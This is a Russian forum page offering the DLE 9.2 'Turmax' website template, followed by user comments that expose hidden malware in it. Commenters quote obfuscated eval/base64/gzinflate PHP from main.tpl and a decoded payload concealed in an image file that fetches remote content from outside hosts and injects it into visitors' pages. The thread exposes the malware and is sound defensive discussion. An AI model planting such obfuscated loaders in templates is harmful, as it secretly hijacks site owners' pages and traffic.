[9.2] Turmax

[9.2] Turmax

Тематика шаблона: Туризм (Оригинал)
Тестировался на версии: DLE 9.2
Тип шаблона: Фиксированный (960 px)
Тестировался в браузерах: Internet Explorer, Mozilla FireFox, Opera, Google Chrome, Safari
Скачать шаблон для DataLife [9.2] Turmax turmax-9.2.rar [730,22 Kb] (cкачиваний: 57)
Другие новости по теме:

Категория: Шаблоны DLE ----- Просмотров: 454 ----- Комментариев: 14

Вернуться

  • tiroboy

  • 7 августа 2011 13:03
  • Группа: User
  • ICQ: --
  • Регистрация: 27.01.2009
  • Комментариев: 11
  • Публикаций: 0
^
Советую пройтись по шаблону в поисках eval, str_rot13, gzinflate и прочей ху*ни, их тут дочерта.
А автору топика следовало бы хоть проверить, что выкладываешь!
  • woply

  • 7 августа 2011 13:35
  • Группа: User
  • ICQ: --
  • Регистрация: 9.07.2011
  • Комментариев: 2
  • Публикаций: 24
^
а что это за код?
Расположенный в main.tpl
Line 26:
<script type="text/javascript" language="javascript" src="{THEME}/js/DD_belatedPNG.js"></script><? eval(str_rot13(gzinflate(base64_decode('K0ssqMwoLNJQSU+u1LUr
LEvVU9cvq8orKUrTL05KSi9KNdIrTy5R17QGAA==')))); ?>

Line 399
<? eval(gzinflate(base64_decode(
str_rot13(strrev
('=NtTqmIANbFSy8GBhp9EtDncOcRAXNMehqXMvTyaMFMIvu1aGnWyed2xMXSKDSXVoxTDcZ
xjwCYYW/H03rSlB30F')))));
?>


Не когда с подобным не сталкивался? Объясните пожалуйста это что вредоносный код, и что он делает?
  • AlexBen

  • 7 августа 2011 13:46
  • Группа: User
  • ICQ: 1739390
  • Регистрация: 29.01.2010
  • Комментариев: 274
  • Публикаций: 44
^
автору следующий раз дам Бан.
Т.к. понимаю что не все в этом разбираются, более лояльное к этому подошел.
И в итоге это оказалось не особо опасный код.
шаблон перезалью. tiroboy, спасибо
это называется вредоносный код, через который могут либо взломать, или сливать траф
<? eval(str_rot13(gzinflate(base64_decode('K0ssqMwoLNJQSU+u1LUr
LEvVU9cvq8orKUrTL05KSi9KNdIrTy5R17QGAA==')))); ?>
ИЛИ это может еще быть куски php кода (возможно не вредоносные) с портации вордпресс.
Т.к это php код, который не опасен для dle, если вы не правили движок на исполнение php кода в шаблонах.
Но удалять данный код обязательно!

Итак первый кусок кода означает:
include($tpl->dir.'/images/footer2.jpg');


Второй (который большой):
echo'</div>
</div>
</div>
</div>
</div>
</div><div style="float:right">'; echo $tpl->code; echo '</div>';

--------------------
  • vilcom

  • 7 августа 2011 16:08
  • Группа: User
  • ICQ: 6017724
  • Регистрация: 18.10.2008
  • Комментариев: 276
  • Публикаций: 4
^
Вот и виновник торжества.

if($_COOKIE['dle_show']) $tpl->code = '';
elseif($is_logged) { setcookie("dle_show", 1,time()+3600000); $tpl->code = ''; }
else {
$dom = preg_replace('/^www\./','',$_SERVER['HTTP_HOST
9;]);
$tpl->code = file_get_contents('http://cache.naturestudio.ru/'.$dom.'/
9;.base64_encode($_SERVER['REQUEST_URI']));
if(!$tpl->code) $tpl->code = file_get_contents('http://server.naturestudio.ru/?c=code&charset
='.$config['charset'].'&url='.$dom.'&pag
e='.urlencode($_SERVER['REQUEST_URI']));
}

--------------------
  • AlexBen

  • 7 августа 2011 18:25
  • Группа: User
  • ICQ: 1739390
  • Регистрация: 29.01.2010
  • Комментариев: 274
  • Публикаций: 44
^
vilcom,
тоже был закодирован? или в картинке где-то.
Блин нет сейчас времени перезалить, буду признателен кто скинет уже очищенный

--------------------
  • vilcom

  • 7 августа 2011 18:47
  • Группа: User
  • ICQ: 6017724
  • Регистрация: 18.10.2008
  • Комментариев: 276
  • Публикаций: 4
^
AlexBen, это раскодированный footer2.jpg

--------------------
  • (ppoe)

  • 9 августа 2011 13:04
  • Группа: Модератор +
  • ICQ: 116205
  • Регистрация: 22.04.2009
  • Комментариев: 230
  • Публикаций: 7
^
красавцы nh

--------------------
  • Yeti

  • 9 августа 2011 21:04
  • Группа: User
  • ICQ: 9277210
  • Регистрация: 13.07.2011
  • Комментариев: 7
  • Публикаций: 2
^
Цитата: ppoe

красавцы nh

не красавцы, а продолжатели неокса и бороды, один кодил картинки, второй пользовался статусом администратора и поддержкой....

--------------------
  • (ppoe)

  • 9 августа 2011 22:13
  • Группа: Модератор +
  • ICQ: 116205
  • Регистрация: 22.04.2009
  • Комментариев: 230
  • Публикаций: 7
^
Yeti, мой комментарий был адресован тем людям, которые нашли "шлюху" в коде и не промолчали, и подняли это в комментариях.
Прошу камень из моего огорода вынести!

--------------------
  • Yeti

  • 9 августа 2011 22:16
  • Группа: User
  • ICQ: 9277210
  • Регистрация: 13.07.2011
  • Комментариев: 7
  • Публикаций: 2
^
[ppoe],
Вынес. Хотя знаю о чём писал если посмотреть историю комментов на данной сайте.
AlexBen, vilcom, +1. Приятно, что с Вашей активностью и здесь появился порядок, а не развод пользователей с троллингом.

--------------------
  • (ppoe)

  • 10 августа 2011 11:58
  • Группа: Модератор +
  • ICQ: 116205
  • Регистрация: 22.04.2009
  • Комментариев: 230
  • Публикаций: 7
^
Цитата: Yeti
Хотя знаю о чём писал если посмотреть историю комментов на данной сайте.

Не понял,что вы хотели написать.

--------------------
  • Группа: User
  • ICQ: 350851066
  • Регистрация: 21.01.2010
  • Комментариев: 2
  • Публикаций: 0
^
мммм в шаблоне fullstory рекламма присуцтвует)
  • (ppoe)

  • 11 августа 2011 01:29
  • Группа: Модератор +
  • ICQ: 116205
  • Регистрация: 22.04.2009
  • Комментариев: 230
  • Публикаций: 7
^
Едвард, удаляем, либо меняем текст под себя.

--------------------
  • Группа: User
  • ICQ: 350851066
  • Регистрация: 21.01.2010
  • Комментариев: 2
  • Публикаций: 0
^
[ppoe], да так и делаю)